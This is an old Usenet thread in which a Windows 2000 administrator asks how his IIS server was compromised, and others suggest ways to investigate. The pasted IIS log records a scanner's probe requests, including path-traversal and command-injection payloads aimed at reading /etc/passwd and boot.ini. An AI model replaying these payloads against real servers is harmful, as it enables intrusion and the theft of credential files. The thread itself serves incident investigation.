I have a Windows 2000 server that is current w/ the latest patches from MS.
It is running an IIS server that is configured w/ Microsoft's URLScan tool.
It is also running Terminal Services w/ 128 bit encryption turned on. I
have a firewall configured to allow only inbound/outbound HTTP traffic on
port 80 and Terminal Services. I'm also running Snort as an IDS, a virus
scanner that updates/scans nightly. I have Windows security auditing turned
on. I've also hardened the system by turning off all unnecessary service
and making all the appropriate registry changes to restrict a access (e.g.
disabling anonymous access).

Sounds somewhat secure, right?

Last night I was hacked. I'm still trying to sort out what happened. I saw
a series of attempts to attack IIS that the IIS log claimed were coming from
itself. Unfortunately, my firewall was not logging HTTP traffic - although
I think I have the source ip via Snort. All these attacks failed. Next, I
saw a series of logon failures using Terminal Services. Again, all of these
failed. Then, a few minutes later, I mysteriously see a process called
A~NSISu_.exe. This seems to come out of nowhere. Prior to this I did not
see any cmd sessions or anything else that suggests the attacker
successfully breached my server

Below is the web log followed by the event in the event viewer that showed
the first visible process of the attack. Following this, I saw a series of
proccesses start (cmd.exe, nbstat, route).

I can take care of reinstalling and hardening my system. I have one primary
concern at this stage: understanding how they cracked my server. If you
have advice or suggestions, it would be appreciated.





2003-08-02 05:54:56 192.168.0.1 - W3SVC1 MYSERVER 192.168.0.1 80 GET
/<Rejected-By-UrlScan> ~/*.idc 404 4184 21 0 - -
2003-08-02 05:54:56 192.168.0.1 - W3SVC1 MYSERVER 192.168.0.1 80 GET
/iisadmin/ - 404 4184 25 0 - -
2003-08-02 05:54:56 192.168.0.1 - W3SVC1 MYSERVER 192.168.0.1 80 GET
/<Rejected-By-UrlScan>
~/default.asp%20%20%20%20%20%20%20%20%20%20%20%20%20 %20%20%20%20%20%20%20%20
%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%2 0%20%20%20%20%20%20%20%20%
20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20 %20%20%20%20%20%20%20%20%2
0%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20% 20%20%20%20%20%20%20%20%20
%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%2 0%20%20%20%20%20%20%20%20%
20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20 %20%20%20%20%20%20%20%20%2
0%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20% 20%20%20%20%20%20%20%20%20
%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%2 0%20%20%20%20%20%20%20%20%
20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20 %20%20%20%20%20%20%20%20%2
0%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20% 20%20%20%20%20%20%20%20%20
%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%2 0%20%20%20%20%20%20%20%20%
20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20 %20%20%20%20%20%20%20%20%2
0.htr 404 4184 931 16 - -
2003-08-02 05:54:56 192.168.0.1 - W3SVC1 MYSERVER 192.168.0.1 80 GET
/msadc/msadcs.dll - 404 4184 32 0 - -
2003-08-02 05:54:56 192.168.0.1 - W3SVC1 MYSERVER 192.168.0.1 80 GET
/<Rejected-By-UrlScan> ~/scripts/iisadmin/bdir.htr 404 4184 41 0 - -
2003-08-02 05:54:56 192.168.0.1 - W3SVC1 MYSERVER 192.168.0.1 80 GET
/<Rejected-By-UrlScan> ~/iissamples/issamples/query.idq 404 4184 46 0 - -
2003-08-02 05:54:56 192.168.0.1 - W3SVC1 MYSERVER 192.168.0.1 80 GET
/<Rejected-By-UrlScan> ~/iissamples/issamples/fastq.idq 404 4184 46 0 - -
2003-08-02 05:54:56 192.168.0.1 - W3SVC1 MYSERVER 192.168.0.1 80 GET
/<Rejected-By-UrlScan> ~/iissamples/exair/search/search.idq 404 4184 50
0 - -
2003-08-02 05:54:56 192.168.0.1 - W3SVC1 MYSERVER 192.168.0.1 80 GET
/<Rejected-By-UrlScan> ~/iissamples/exair/search/query.idq 404 4184 49 0 - -
2003-08-02 05:54:56 192.168.0.1 - W3SVC1 MYSERVER 192.168.0.1 80 GET
/<Rejected-By-UrlScan> ~/prxdocs/misc/prxrch.idq 404 4184 39 0 - -
2003-08-02 05:54:56 192.168.0.1 - W3SVC1 MYSERVER 192.168.0.1 80 GET
/<Rejected-By-UrlScan> ~/iissamples/issamples/oop/qfullhit.htw 404 4184 143
0 - -
2003-08-02 05:54:56 192.168.0.1 - W3SVC1 MYSERVER 192.168.0.1 80 GET
/<Rejected-By-UrlScan> ~/iissamples/issamples/oop/qsumrhit.htw 404 4184 143
0 - -
2003-08-02 05:54:56 192.168.0.1 - W3SVC1 MYSERVER 192.168.0.1 80 GET
/<Rejected-By-UrlScan> ~/scripts/samples/search/qfullhit.htw 404 4184 51
0 - -
2003-08-02 05:54:56 192.168.0.1 - W3SVC1 MYSERVER 192.168.0.1 80 GET
/<Rejected-By-UrlScan> ~/scripts/samples/search/qsumrhit.htw 404 4184 51
0 - -
2003-08-02 05:54:56 192.168.0.1 - W3SVC1 MYSERVER 192.168.0.1 80 GET
/<Rejected-By-UrlScan> ~/abczxv.htw 404 4184 26 0 - -
2003-08-02 05:54:56 192.168.0.1 - W3SVC1 MYSERVER 192.168.0.1 80 GET
/<Rejected-By-UrlScan> ~/scripts/samples/search/author.idq 404 4184 49 0 - -
2003-08-02 05:54:56 192.168.0.1 - W3SVC1 MYSERVER 192.168.0.1 80 GET
/<Rejected-By-UrlScan> ~/scripts/samples/search/filesize.idq 404 4184 51
0 - -
2003-08-02 05:54:56 192.168.0.1 - W3SVC1 MYSERVER 192.168.0.1 80 GET
/<Rejected-By-UrlScan> ~/scripts/samples/search/filetime.idq 404 4184 51
0 - -
2003-08-02 05:54:56 192.168.0.1 - W3SVC1 MYSERVER 192.168.0.1 80 GET
/<Rejected-By-UrlScan> ~/scripts/samples/search/query.idq 404 4184 48 0 - -
2003-08-02 05:54:56 192.168.0.1 - W3SVC1 MYSERVER 192.168.0.1 80 GET
/<Rejected-By-UrlScan> ~/scripts/samples/search/queryhit.idq 404 4184 51
0 - -
2003-08-02 05:54:56 192.168.0.1 - W3SVC1 MYSERVER 192.168.0.1 80 GET
/<Rejected-By-UrlScan> ~/scripts/samples/search/simple.idq 404 4184 49 0 - -
2003-08-02 05:54:56 192.168.0.1 - W3SVC1 MYSERVER 192.168.0.1 80 GET
/<Rejected-By-UrlScan> ~/scripts/samples/search/webhits.exe 404 4184 50
0 - -
2003-08-02 05:54:56 192.168.0.1 - W3SVC1 MYSERVER 192.168.0.1 80 GET
/cfcache.map - 404 4184 27 0 - -
2003-08-02 05:54:56 192.168.0.1 - W3SVC1 MYSERVER 192.168.0.1 80 GET
/_vti_pvt/administrators.pwd - 403 4358 43 344 - -
2003-08-02 05:54:56 192.168.0.1 - W3SVC1 MYSERVER 192.168.0.1 80 GET
/_vti_pvt/authors.pwd - 403 4358 36 16 - -
2003-08-02 05:54:56 192.168.0.1 - W3SVC1 MYSERVER 192.168.0.1 80 GET
/_vti_pvt/users.pwd - 403 4358 34 16 - -
2003-08-02 05:54:56 192.168.0.1 - W3SVC1 MYSERVER 192.168.0.1 80 GET
/_vti_pvt/service.pwd - 403 4358 36 0 - -
2003-08-02 05:54:56 192.168.0.1 - W3SVC1 MYSERVER 192.168.0.1 80 POST
/_vti_bin/shtml.dll/_vti_rpc - 405 4230 368 15 10.2.2.50 MSFrontPage/4.0
2003-08-02 05:54:56 192.168.0.1 - W3SVC1 MYSERVER 192.168.0.1 80 GET
/cgi-bin/ - 404 4184 24 0 - -
2003-08-02 05:54:56 192.168.0.1 - W3SVC1 MYSERVER 192.168.0.1 80 GET
/scripts/ - 401 4572 48 47 - -
2003-08-02 05:54:56 192.168.0.1 - W3SVC1 MYSERVER 192.168.0.1 80 GET
/cgi-bin/sh - 404 4184 26 0 - -
2003-08-02 05:54:56 192.168.0.1 - W3SVC1 MYSERVER 192.168.0.1 80 GET
/cgi-bin/csh - 404 4184 27 0 - -
2003-08-02 05:54:56 192.168.0.1 - W3SVC1 MYSERVER 192.168.0.1 80 GET
/cgi-bin/ksh - 404 4184 27 0 - -
2003-08-02 05:54:56 192.168.0.1 - W3SVC1 MYSERVER 192.168.0.1 80 GET
/<Rejected-By-UrlScan> ~/cgi-bin/cmd.exe 404 4184 34 0 - -
2003-08-02 05:54:56 192.168.0.1 - W3SVC1 MYSERVER 192.168.0.1 80 GET
/<Rejected-By-UrlScan> ~/scripts/cmd.exe 404 4184 34 0 - -
2003-08-02 05:54:56 192.168.0.1 - W3SVC1 MYSERVER 192.168.0.1 80 GET
/<Rejected-By-UrlScan> ~/cgi-bin/cmd32.exe 404 4184 33 0 - -
2003-08-02 05:54:56 192.168.0.1 - W3SVC1 MYSERVER 192.168.0.1 80 GET
/<Rejected-By-UrlScan> ~/scripts/cmd32.exe 404 4184 33 0 - -
2003-08-02 05:54:56 192.168.0.1 - W3SVC1 MYSERVER 192.168.0.1 80 GET
/<Rejected-By-UrlScan> ~/cgi-bin/perl.exe 404 4184 35 0 - -
2003-08-02 05:54:56 192.168.0.1 - W3SVC1 MYSERVER 192.168.0.1 80 GET
/<Rejected-By-UrlScan> ~/scripts/perl.exe 404 4184 35 0 - -
2003-08-02 05:54:56 192.168.0.1 - W3SVC1 MYSERVER 192.168.0.1 80 GET
/<Rejected-By-UrlScan> ~/scripts/tools/newdsn.exe 404 4184 40 0 - -
2003-08-02 05:54:56 192.168.0.1 - W3SVC1 MYSERVER 192.168.0.1 80 GET
/<Rejected-By-UrlScan> ~/_vti_bin/fpcount.exe 404 4184 71 0 - -
2003-08-02 05:54:56 192.168.0.1 - W3SVC1 MYSERVER 192.168.0.1 80 GET
/<Rejected-By-UrlScan> ~/rightfax/fuwww.dll/ 404 4184 36 0 - -
2003-08-02 05:54:56 192.168.0.1 - W3SVC1 MYSERVER 192.168.0.1 80 GET
/iissamples/issamples/query.asp - 403 4270 46 78 - -
2003-08-02 05:54:56 192.168.0.1 - W3SVC1 MYSERVER 192.168.0.1 80 GET
/samples/search/queryhit.htm - 404 4184 43 0 - -
2003-08-02 05:54:56 192.168.0.1 - W3SVC1 MYSERVER 192.168.0.1 80 GET
/scripts/*+.pl - 401 4572 62 0 - -
2003-08-02 05:54:56 192.168.0.1 - W3SVC1 MYSERVER 192.168.0.1 80 GET
/iissamples/exair/search/advsearch.asp - 403 4270 53 0 - -
2003-08-02 05:54:56 192.168.0.1 - W3SVC1 MYSERVER 192.168.0.1 80 GET
/<Rejected-By-UrlScan> ~/iisadmpwd/aexp3.htr 404 4184 35 0 - -
2003-08-02 05:54:56 192.168.0.1 - W3SVC1 MYSERVER 192.168.0.1 80 GET
/scripts/repost.asp - 403 4270 34 0 - -
2003-08-02 05:54:56 192.168.0.1 - W3SVC1 MYSERVER 192.168.0.1 80 GET
/<Rejected-By-UrlScan> ~/ 404 4184 20 0 - -
2003-08-02 05:54:56 192.168.0.1 - W3SVC1 MYSERVER 192.168.0.1 80 GET
/<Rejected-By-UrlScan> ~/users/ 404 4184 26 0 - -
2003-08-02 05:54:56 192.168.0.1 - W3SVC1 MYSERVER 192.168.0.1 80 GET
/<Rejected-By-UrlScan> ~/cgi-bin/ 404 4184 28 0 - -
2003-08-02 05:54:56 192.168.0.1 - W3SVC1 MYSERVER 192.168.0.1 80 GET
/<Rejected-By-UrlScan> ~/scripts/ 404 4184 28 0 - -
2003-08-02 05:54:56 192.168.0.1 - W3SVC1 MYSERVER 192.168.0.1 80 GET
/iissamples/exair/howitworks/codebrws.asp - 403 4270 56 0 - -
2003-08-02 05:54:56 192.168.0.1 - W3SVC1 MYSERVER 192.168.0.1 80 GET
/msadc/samples/selector/showcode.asp - 403 4270 51 0 - -
2003-08-02 05:54:56 192.168.0.1 - W3SVC1 MYSERVER 192.168.0.1 80 GET
/index.htm PageServices 200 0 29 0 - -
2003-08-02 05:54:56 192.168.0.1 - W3SVC1 MYSERVER 192.168.0.1 80 GET
/search - 404 4184 23 0 - -
2003-08-02 05:54:56 192.168.0.1 - W3SVC1 MYSERVER 192.168.0.1 80 GET
/index.html+ - 404 4184 29 0 - -
2003-08-02 05:54:56 192.168.0.1 - W3SVC1 MYSERVER 192.168.0.1 80 GET
/<Rejected-By-UrlScan> ~/scripts/rguest.exe 404 4184 34 0 - -
2003-08-02 05:54:56 192.168.0.1 - W3SVC1 MYSERVER 192.168.0.1 80 GET
/<Rejected-By-UrlScan> ~/cgi-bin/rguest.exe 404 4184 34 0 - -
2003-08-02 05:54:56 192.168.0.1 - W3SVC1 MYSERVER 192.168.0.1 80 GET
/<Rejected-By-UrlScan> ~/scripts/wguest.exe 404 4184 34 0 - -
2003-08-02 05:54:56 192.168.0.1 - W3SVC1 MYSERVER 192.168.0.1 80 GET
/<Rejected-By-UrlScan> ~/cgi-bin/wguest.exe 404 4184 34 0 - -
2003-08-02 05:54:56 192.168.0.1 - W3SVC1 MYSERVER 192.168.0.1 80 GET
/<Rejected-By-UrlScan> ~/cgi-bin/get32.exe 404 4184 33 0 - -
2003-08-02 05:54:56 192.168.0.1 - W3SVC1 MYSERVER 192.168.0.1 80 GET
/cgi-bin/alibaba.pl - 404 4184 34 0 - -
2003-08-02 05:54:56 192.168.0.1 - W3SVC1 MYSERVER 192.168.0.1 80 GET
/<Rejected-By-UrlScan> ~/cgi-bin/tst.bat 404 4184 31 0 - -
2003-08-02 05:54:56 192.168.0.1 - W3SVC1 MYSERVER 192.168.0.1 80 GET
/<Rejected-By-UrlScan> ~/cgi-win/uploader.exe 404 4184 36 0 - -
2003-08-02 05:54:56 192.168.0.1 - W3SVC1 MYSERVER 192.168.0.1 80 GET
/cgi-bin/FormHandler.cgi - 404 4184 39 0 - -
2003-08-02 05:54:56 192.168.0.1 - W3SVC1 MYSERVER 192.168.0.1 80 GET
/cgi-bin/testcgi - 404 4184 31 0 - -
2003-08-02 05:54:56 192.168.0.1 - W3SVC1 MYSERVER 192.168.0.1 80 GET
/cgi-bin/test-cgi/* * 404 4184 36 0 - -
2003-08-02 05:54:56 192.168.0.1 - W3SVC1 MYSERVER 192.168.0.1 80 GET
/cgi-bin/test.cgi - 404 4184 32 0 - -
2003-08-02 05:54:56 192.168.0.1 - W3SVC1 MYSERVER 192.168.0.1 80 GET
/cgi-bin/enivron.pl - 404 4184 34 0 - -
2003-08-02 05:54:56 192.168.0.1 - W3SVC1 MYSERVER 192.168.0.1 80 GET
/scripts/environ.pl - 401 4572 68 0 - -
2003-08-02 05:54:56 192.168.0.1 - W3SVC1 MYSERVER 192.168.0.1 80 GET
/server-info - 404 4184 27 0 - -
2003-08-02 05:54:56 192.168.0.1 - W3SVC1 MYSERVER 192.168.0.1 80 GET
/server-status - 404 4184 29 0 - -
2003-08-02 05:54:56 192.168.0.1 - W3SVC1 MYSERVER 192.168.0.1 80 GET
/cgi-bin/tcsh - 404 4184 28 0 - -
2003-08-02 05:54:56 192.168.0.1 - W3SVC1 MYSERVER 192.168.0.1 80 GET
/<Rejected-By-UrlScan> ~/cgi-bin/cgitest.exe 404 4184 35 0 - -
2003-08-02 05:54:56 192.168.0.1 - W3SVC1 MYSERVER 192.168.0.1 80 GET
/~root - 404 4184 21 0 - -
2003-08-02 05:54:56 192.168.0.1 - W3SVC1 MYSERVER 192.168.0.1 80 GET /~ftp -
404 4184 20 0 - -
2003-08-02 05:54:56 192.168.0.1 - W3SVC1 MYSERVER 192.168.0.1 80 GET
/cgi-bin/phf Qalias=&Qname=haqr&Qemail=&Qnickname=&Qoffice_phon e= 404 4184
80 0 - -
2003-08-02 05:54:56 192.168.0.1 - W3SVC1 MYSERVER 192.168.0.1 80 GET
/cgi-bin/count.cgi - 404 4184 33 0 - -
2003-08-02 05:54:56 192.168.0.1 - W3SVC1 MYSERVER 192.168.0.1 80 GET
/cgi-bin/nph-test-cgi - 404 4184 36 0 - -
2003-08-02 05:54:56 192.168.0.1 - W3SVC1 MYSERVER 192.168.0.1 80 GET
/cgi-bin/webdist.cgi - 404 4184 35 0 - -
2003-08-02 05:54:56 192.168.0.1 - W3SVC1 MYSERVER 192.168.0.1 80 GET
/cgi-bin/aglimpse.cgi - 404 4184 36 0 - -
2003-08-02 05:54:56 192.168.0.1 - W3SVC1 MYSERVER 192.168.0.1 80 GET
/cgi-bin/campas %0acat%0a/etc/passwd%0a 404 4184 54 0 - -
2003-08-02 05:54:56 192.168.0.1 - W3SVC1 MYSERVER 192.168.0.1 80 GET
/cgi-bin/jj - 404 4184 26 0 - -
2003-08-02 05:54:56 192.168.0.1 - W3SVC1 MYSERVER 192.168.0.1 80 GET
/cgi-bin/formmail - 404 4184 32 0 - -
2003-08-02 05:54:56 192.168.0.1 - W3SVC1 MYSERVER 192.168.0.1 80 GET
/cgi-bin/formmail.pl - 404 4184 35 0 - -
2003-08-02 05:54:56 192.168.0.1 - W3SVC1 MYSERVER 192.168.0.1 80 GET
/cgi-bin/faxsurvey /bin/cat%20/etc/passwd 404 4184 56 0 - -
2003-08-02 05:54:56 192.168.0.1 - W3SVC1 MYSERVER 192.168.0.1 80 GET
/cgi-bin/view-source ../../../../../../../etc/passwd 404 4184 67 0 - -
2003-08-02 05:54:56 192.168.0.1 - W3SVC1 MYSERVER 192.168.0.1 80 GET
/<Rejected-By-UrlScan> ~/scripts/srchadm/webhits.exe 404 4184 43 0 - -
2003-08-02 05:54:56 192.168.0.1 - W3SVC1 MYSERVER 192.168.0.1 80 GET
/<Rejected-By-UrlScan> ~/scripts/tools/mkilog.exe 404 4184 40 0 - -
2003-08-02 05:54:56 192.168.0.1 - W3SVC1 MYSERVER 192.168.0.1 80 GET
/<Rejected-By-UrlScan> ~/scripts/tools/mkplog.exe 404 4184 40 0 - -
2003-08-02 05:54:56 192.168.0.1 - W3SVC1 MYSERVER 192.168.0.1 80 GET
/cgi-bin/query mss=../../../../../../../etc/passwd 404 4184 65 0 - -
2003-08-02 05:54:56 192.168.0.1 - W3SVC1 MYSERVER 192.168.0.1 80 GET
/<Rejected-By-UrlScan> ~/scripts/htimage.exe 404 4184 39 0 - -
2003-08-02 05:54:56 192.168.0.1 - W3SVC1 MYSERVER 192.168.0.1 80 GET
/<Rejected-By-UrlScan> ~/cgi-bin/htimage.exe 404 4184 39 0 - -
2003-08-02 05:54:56 192.168.0.1 - W3SVC1 MYSERVER 192.168.0.1 80 GET
/<Rejected-By-UrlScan> ~/scripts/samples/search/author.idq 404 4184 49 0 - -
2003-08-02 05:54:56 192.168.0.1 - W3SVC1 MYSERVER 192.168.0.1 80 GET
/<Rejected-By-UrlScan> ~/scripts/samples/search/filesize.idq 404 4184 51
0 - -
2003-08-02 05:54:56 192.168.0.1 - W3SVC1 MYSERVER 192.168.0.1 80 GET
/<Rejected-By-UrlScan> ~/scripts/samples/search/filetime.idq 404 4184 51
0 - -
2003-08-02 05:54:56 192.168.0.1 - W3SVC1 MYSERVER 192.168.0.1 80 GET
/<Rejected-By-UrlScan> ~/scripts/samples/search/query.idq 404 4184 48 0 - -
2003-08-02 05:54:56 192.168.0.1 - W3SVC1 MYSERVER 192.168.0.1 80 GET
/<Rejected-By-UrlScan> ~/scripts/samples/search/queryhit.idq 404 4184 51
0 - -
2003-08-02 05:54:56 192.168.0.1 - W3SVC1 MYSERVER 192.168.0.1 80 GET
/<Rejected-By-UrlScan> ~/scripts/samples/search/simple.idq 404 4184 49 0 - -
2003-08-02 05:54:56 192.168.0.1 - W3SVC1 MYSERVER 192.168.0.1 80 GET
/<Rejected-By-UrlScan> ~/scripts/samples/search/qfullhit.htw 404 4184 51
0 - -
2003-08-02 05:54:56 192.168.0.1 - W3SVC1 MYSERVER 192.168.0.1 80 GET
/<Rejected-By-UrlScan> ~/scripts/samples/search/qsumrhit.htw 404 4184 51
0 - -
2003-08-02 05:54:56 192.168.0.1 - W3SVC1 MYSERVER 192.168.0.1 80 GET
/<Rejected-By-UrlScan> ~/scripts/samples/search/webhits.exe 404 4184 50
0 - -
2003-08-02 05:54:56 192.168.0.1 - W3SVC1 MYSERVER 192.168.0.1 80 GET
/robots.txt - 404 4184 26 0 - -
2003-08-02 05:54:56 192.168.0.1 - W3SVC1 MYSERVER 192.168.0.1 80 GET
/<Rejected-By-UrlScan> ~/cgi-bin/echo.bat 404 4184 41 0 - -
2003-08-02 05:54:56 192.168.0.1 - W3SVC1 MYSERVER 192.168.0.1 80 GET
/<Rejected-By-UrlScan> ~/cgi-bin/hello.bat 404 4184 42 0 - -
2003-08-02 05:54:56 192.168.0.1 - W3SVC1 MYSERVER 192.168.0.1 80 GET
/cgi-bin/htsearch exclude=%60/etc/passwd%60 404 4184 58 0 - -
2003-08-02 05:54:56 192.168.0.1 - W3SVC1 MYSERVER 192.168.0.1 80 GET
/cgi-bin/ezshopper/loadpage.cgi user_id=1&file=|cat%20/etc/passwd| 404 4184
81 0 - -
2003-08-02 05:54:56 192.168.0.1 - W3SVC1 MYSERVER 192.168.0.1 80 GET
/cgi-bin/ezshopper/search.cgi
user_id=id&database=dbase1.exm&template=../../../../../../../etc/passwd&dist
inct=1 404 4184 127 0 - -
2003-08-02 05:54:56 192.168.0.1 - W3SVC1 MYSERVER 192.168.0.1 80 GET
/<Rejected-By-UrlScan> ~/names.nsf/ 404 4184 31 0 - -
2003-08-02 05:54:56 192.168.0.1 - W3SVC1 MYSERVER 192.168.0.1 80 GET
/<Rejected-By-UrlScan> ~/catalog.nsf/ 404 4184 33 0 - -
2003-08-02 05:54:56 192.168.0.1 - W3SVC1 MYSERVER 192.168.0.1 80 GET
/<Rejected-By-UrlScan> ~/log.nsf/ 404 4184 29 0 - -
2003-08-02 05:54:56 192.168.0.1 - W3SVC1 MYSERVER 192.168.0.1 80 GET
/<Rejected-By-UrlScan> ~/domlog.nsf/ 404 4184 32 0 - -
2003-08-02 05:54:56 192.168.0.1 - W3SVC1 MYSERVER 192.168.0.1 80 GET
/<Rejected-By-UrlScan> ~/domcfg.nsf/ 404 4184 32 0 - -
2003-08-02 05:54:56 192.168.0.1 - W3SVC1 MYSERVER 192.168.0.1 80 GET
/cgi-bin/sojourn.cgi cat=../../../../../../../etc/passwd 404 4184 71 0 - -
2003-08-02 05:54:56 192.168.0.1 - W3SVC1 MYSERVER 192.168.0.1 80 GET
/<Rejected-By-UrlScan> ~/ows-bin/perlidlc.bat 404 4184 41 0 - -
2003-08-02 05:54:56 192.168.0.1 - W3SVC1 MYSERVER 192.168.0.1 80 GET
/<Rejected-By-UrlScan> ~/cgi-bin/windmail.exe 404 4184 36 0 - -
2003-08-02 05:54:56 192.168.0.1 - W3SVC1 MYSERVER 192.168.0.1 80 GET
/_vti_bin/shtml.dll - 403 4358 34 0 - -
2003-08-02 05:54:56 192.168.0.1 - W3SVC1 MYSERVER 192.168.0.1 80 GET
/.htaccess - 404 4184 25 0 - -
2003-08-02 05:54:56 192.168.0.1 - W3SVC1 MYSERVER 192.168.0.1 80 GET
/_vti_pvt/doctodep.btr - 403 4358 37 0 - -
2003-08-02 05:54:56 192.168.0.1 - W3SVC1 MYSERVER 192.168.0.1 80 GET
/carbo.dll icatcommand=..\..\..\..\boot.ini&catalogname=catal og 404 4184 78
16 - -
2003-08-02 05:54:56 192.168.0.1 - W3SVC1 MYSERVER 192.168.0.1 80 GET
/cfdocs/expeval/ExprCalc.cfm OpenFilePath=c:\boot.ini 404 4184 68 0 - -
2003-08-02 05:54:56 192.168.0.1 - W3SVC1 MYSERVER 192.168.0.1 80 GET
/cfdocs/expeval/openfile.cfm - 404 4184 43 0 - -
2003-08-02 05:54:56 192.168.0.1 - W3SVC1 MYSERVER 192.168.0.1 80 GET
/cgi-bin/pfdispaly.cgi '%0A/bin/uname%20-a|' 404 4184 59 0 - -
2003-08-02 05:54:56 192.168.0.1 - W3SVC1 MYSERVER 192.168.0.1 80 GET
/cgi-bin/MachineInfo - 404 4184 35 0 - -
2003-08-02 05:54:56 192.168.0.1 - W3SVC1 MYSERVER 192.168.0.1 80 GET
/mylog.phtml screen=/etc/passwd 404 4184 46 0 - -
2003-08-02 05:54:56 192.168.0.1 - W3SVC1 MYSERVER 192.168.0.1 80 GET
/mlog.phtml screen=/etc/passwd 404 4184 45 0 - -
2003-08-02 05:54:56 192.168.0.1 - W3SVC1 MYSERVER 192.168.0.1 80 GET
/cgi-bin/wrap - 404 4184 28 0 - -
2003-08-02 05:54:56 192.168.0.1 - W3SVC1 MYSERVER 192.168.0.1 80 GET
/<Rejected-By-UrlScan> ~/ows-bin/oasnetconf.exe 404 4184 72 0 - -
2003-08-02 05:54:56 192.168.0.1 - W3SVC1 MYSERVER 192.168.0.1 80 GET
/<Rejected-By-UrlScan> ~/ows-bin/oaskill.exe 404 4184 45 0 - -
2003-08-02 05:54:56 192.168.0.1 - W3SVC1 MYSERVER 192.168.0.1 80 GET
/<Rejected-By-UrlScan> ~/cgi-shl/win-c-sample.exe 404 4184 40 0 - -




Event Type: Success Audit
Event Source: Security
Event Category: Detailed Tracking
Event ID: 592
Date: 8/2/2003
Time: 2:50:28 AM
User: MYSERVER\MyAdmin
Computer: MYSERVER
Description:
A new process has been created:
New Process ID: 1764
Image File Name: \DOCUME~1\ADMINI~1\LOCALS~1\Temp\A~NSISu_.exe
Creator Process ID: 1916
User Name: MyAdmin
Domain: MYSERVER
Logon ID: (0x0,0xDE65)

On Sun, 03 Aug 2003 01:51:49 GMT "Frank" <frank@nospamplease.com> wrote:
nope

/fc

I saw no successes in your IIS Log. Believe me if that was true for all your connections you wouldn't be serving nothing.

--
George Hester
__________________________________
"Frank" <frank@nospamplease.com> wrote in message news:VUZWa.36782$Vt6.14734@rwcrnsc52.ops.asp.att.n et...

I don't know how it relates to this whole thing, but A~NSISu_.exe sounds
quite a bit like Nullsoft Install System (create a Win32 self-extracting
executable installer) http://www.nullsoft.com/free/nsis/.


"George Hester" <hesterloli@hotmail.com> wrote in message
news:eLSB$JoWDHA.3924@tk2msftngp13.phx.gbl...
I saw no successes in your IIS Log. Believe me if that was true for all
your connections you wouldn't be serving nothing.

--
George Hester
__________________________________
"Frank" <frank@nospamplease.com> wrote in message
news:VUZWa.36782$Vt6.14734@rwcrnsc52.ops.asp.att.n et...

First, of course, do a full updated scan looking for trojan horses and
other ills. If you know your program files and other system files
well, have a look for an odd named file, possibly fitting in but
something may make it look odd. Could most likely be from 50k-1mb in
size most averaging 150-550k. Next, if you need to do some
footprinting on that address you say may be the source. SamSpade.org
provides good tools. If you need further assistance you can contact
echo@echocct.org, attn:SAge. Essentially however, you are only going
to find some basic info on this IP, if lucky they were dumb and didn't
proxy around first and its a static IP. Most of the time though you
will find a proxy, a dead end 99.99%, or a dynamic DHCP type IP also
99.99% end. Even if you do find them, there is 99.99% chance of
nothing coming of it. Other than that, look into SATAN or SAINT to
help check your own network and lots of other tools to try and hack
yourself. Thats the best way to find and plug your holes.

SAge
Echo CCT
www.echocct.org


"Frank" <frank@nospamplease.com> wrote in message news:<VUZWa.36782$Vt6.14734@rwcrnsc52.ops.asp.att. net>...

"... a dynamic DHCP type IP also 99.99% [dead]end"

this is not true. If you can trace back to a actual person IP, you can
contact there ISP. Give the ISP the IP address, date and time that the
offense occurred, and your time zone. The ISP can look through there log
files to find out who was the last person to have the IP before the time
you given.
From that, they can find out the persons mac address, and "null route"
them ie: assign them an ip address of 192.168.10.231, that will prevent
them from getting any internet access. When that person calls the isp to
inquire about there internet connection, they will be caught. Of course
they could always just change there NIC, but im sure most people wouldn't
think to do that.

d0x <dan@no.spam> wrote in message news:<pan.2004.07.17.22.47.16.464381@no.spam>...
Have you ever actually done that? In my experience, most ISPs won't
give that information or talk to you unless you're a law enforcement
person with a subpoena from a court in a country that the ISP
recognizes, and there isn't any language barrier, and you've contacted
them soon enough for them to preserve whatever logs they may or may
not have. Even then, there is a fair chance that what you'll find
isn't a perpetrator, but a virus-infected computer with a hidden proxy
or botnet running on it, or something similar.

Karl Levinson [x y] mvp wrote:
the person.

"Chuckles" <Notthatyou@need.it> wrote in message
news:a5-dnRahPf0BZmbdRVn-gw@telcove.net...

Fair enough. Although if you look at www.mynetwatchman.com, you see that
they do this quite frequently, and they report much less than 1 in 5 success
rate.